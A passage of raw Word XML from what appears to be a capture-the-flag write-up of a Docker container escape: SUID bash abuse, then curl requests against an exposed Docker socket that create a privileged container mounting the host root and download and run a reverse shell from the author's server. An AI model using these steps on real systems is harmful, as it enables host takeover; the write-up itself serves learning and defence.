            <w:color w:val="188038"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cdk-team/CDK</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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http://10.0.15.12/cdk_linux</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--2025-04-18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17:01:53--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http://10.0.15.12/cdk_linux</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Connecting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10.0.15.12:80...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connected.</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HTTP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awaiting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10395800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(9.9M)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[application/octet-stream]</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Saving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'cdk_linux'</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cdk_linux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9.91M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50.6KB/s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35s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2025-04-18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17:04:29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(65.4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KB/s)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'cdk_linux'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[10395800/10395800]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">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transferring the tool, we grant execution permissions and wait for the enumeration to complete. Upon completion, we identify that the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has SUID permissions assigned, allowing us to obtain root access inside the container.</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5748338" cy="3537438"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="27"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48338" cy="35374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execute the binary using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5353050" cy="827042"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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353050" cy="82704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root access inside the container, we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CDK </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again to identify possible vectors for direct interaction with the Docker host. At the end of the execution, we identify that the Docker socket is mounted inside the container as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/docker.sock</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating the possibility of direct communication with the Docker daemon on the host.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5038725" cy="1257300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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038725" cy="1257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240" w:befor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This means that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">container has direct access to the host’s Docker daemon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">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If a process inside the container can interact with this socket (via curl, docker, or similar), it can:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List, create, and run containers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>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Mount the host filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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Execute commands on the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain root access on the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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From this discovery, we list existing containers with the goal of creating a new container that allows command execution directly on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="188038"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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--unix-socket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/var/run/docker.sock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http://localhost/containers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[{"Id":"fe36747c56c296e6ccfe1b31f48ef8cb1ee5fb4a998b715ceaceb3a1eaf7246b","Names":["/glpi"],"Image":"glpi_glpi","ImageID":"sha256:bbd48bef44ae6a74f4280f81297ef820435cada5b91c3f76b84ccf24082c4a89","Command":"docker-php-entrypoint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ache2-foreground","Created":1744213622,"Ports":[{"IP":"0.0.0.0","PrivatePort":80,"PublicPort":8080,"Type":"tcp"},{"IP":"::","PrivatePort":80,"PublicPort":8080,"Type":"tcp"}],"Labels":{"com.docker.compose.config-hash":"55ba5d4e98d0a66164d8bec3ab268e00b776e652e9f93f99d9cd5d51ac6e3f7d","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"glpi","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/opt/glpi","com.docker.compose.service":"glpi","com.docker.compose.version":"1.29.2"},"State":"running","Status":"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HostConfig":{"NetworkMode":"glpi_default"},"NetworkSettings":{"Networks":{"glpi_default":{"IPAMConfig":null,"Links":null,"Aliases":null,"MacAddress":"02:42:ac:1b:00:03","NetworkID":"393ee402e86f05b5faf5a76c9d59f2724519c21b8509c18041f684211b5102df","EndpointID":"aa82f2a0e2133738d771b2b6270ee416c7ce9e2a1b77e5f17124c41cdfbac783","Gateway":"172.27.0.1","IPAddress":"172.27.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":null}}},"Mounts":[{"Type":"bind","Source":"/opt/glpi/flag.txt","Destination":"/flag.txt","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"volume","Name":"glpi_glpi_data","Source":"/var/lib/docker/volumes/glpi_glpi_data/_data","Destination":"/var/www/html","Driver":"local","Mode":"rw","RW":true,"Propagation":""},{"Type":"bind","Source":"/opt/glpi/plugins","Destination":"/var/www/html/plugins","Mode":"rw","RW":true,"Propagation":"rprivate"}]},{"Id":"2c7757021d33cd2de80034abcf0744062142f5edc4f24bb9644d53a113c7bc55","Names":["/glpi_db"],"Image":"mysql:5.7","ImageID":"sha256:5107333e08a87b836d48ff7528b1e84b9c86781cc9f1748bbc1b8c42a870d933","Command":"docker-entrypoint.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sqld","Created":1744213622,"Ports":[{"PrivatePort":33060,"Type":"tcp"},{"PrivatePort":3306,"Type":"tcp"}],"Labels":{"com.docker.compose.config-hash":"c08ce330e46d3591f2b87c2db85359dad9ade7943f279ea82e71057325dd5f87","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"glpi","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/opt/glpi","com.docker.compose.service":"db","com.docker.compose.version":"1.29.2"},"State":"running","Status":"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HostConfig":{"NetworkMode":"glpi_default"},"NetworkSettings":{"Networks":{"glpi_default":{"IPAMConfig":null,"Links":null,"Aliases":null,"MacAddress":"02:42:ac:1b:00:02","NetworkID":"393ee402e86f05b5faf5a76c9d59f2724519c21b8509c18041f684211b5102df","EndpointID":"c219c93e4125a77007052e8a0f11eca54b455193265f2fa480d7ce9dabf832ec","Gateway":"172.27.0.1","IPAddress":"172.27.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":null}}},"Mounts":[{"Type":"volume","Name":"glpi_db_data","Source":"/var/lib/docker/volumes/glpi_db_data/_data","Destination":"/var/lib/mysql","Driver":"local","Mode":"rw","RW":true,"Propagation":""}]}]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">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listing containers via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glpi_glpi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> image already present in the environment with the necessary dependencies. Therefore, we use it to create a new privileged container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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the identified image, we create a new container in privileged mode with the host root directory mounted at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a curl request directly against the exposed Docker socket, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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--unix-socket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/run/docker.sock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http://localhost/containers/create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application/json"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"glpi_glpi",</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"OpenStdin":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"HostConfig":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"Privileged":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["/:/mnt"]</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{"Id":"8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0","Warnings":[]}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">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8">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configuration allows the container full access to the host filesystem, enabling reading, modification, and execution of files outside the isolated Docker environment. We then start the newly created container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/start</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">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starting the container with the host filesystem mounted at /mnt, we transfer the reverse shell to the host by creating an exec session via the Docker socket:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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application/json"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"AttachStdout":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"AttachStderr":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"/tmp/shell-root",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"http://10.0.15.12/shell-root"]</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{"Id":"b3694fd27042e6cbdfa2f94abb24159dd7a4a868ba2f898fa06057851ea71f8e"}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">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BM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>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This command instructs the container to download the payload (reverse shell) hosted on our controlled server.</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With the exec session created, we need to perform the execution.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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--unix-socket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/run/docker.sock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http://localhost/exec/b3694fd27042e6cbdfa2f94abb24159dd7a4a868ba2f898fa06057851ea71f8e/start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application/json"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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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BM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>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Next, we will create a new exec session so that we can apply execute permission to the downloaded shell file.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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application/json"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"AttachStdout":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"AttachStderr":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["chmod",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"/tmp/shell-root"]</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{"Id":"922489bfbe9237f61a35793a55045a95808d964045db2a1caccd4f73bd4d4dff"}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">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BM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>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And once again, we start the session:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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--unix-socket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/run/docker.sock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http://localhost/exec/922489bfbe9237f61a35793a55045a95808d964045db2a1caccd4f73bd4d4dff/start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application/json"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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">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With the shell file ready to be executed, we create one last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exec </w:t>
      </w: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session to run the payload inside the container (which is linked to the host's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/mnt</w:t>
      </w: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3">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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application/json"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"AttachStdout":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"AttachStderr":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"/tmp/shell-root"]</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{"Id":"a7a419283dea9ad924c42e67376ae6e0ba9d47aea97442256b3607133ee0f7fe"}</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Now let's execute it to get our reverse connection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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--unix-socket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/run/docker.sock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http://localhost/exec/a7a419283dea9ad924c42e67376ae6e0ba9d47aea97442256b3607133ee0f7fe/start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application/json"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Once executed, we obtain reverse root access inside the newly created container.</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5672138" cy="1790723"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="30"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672138" cy="179072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From root access inside the container, we navigate to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
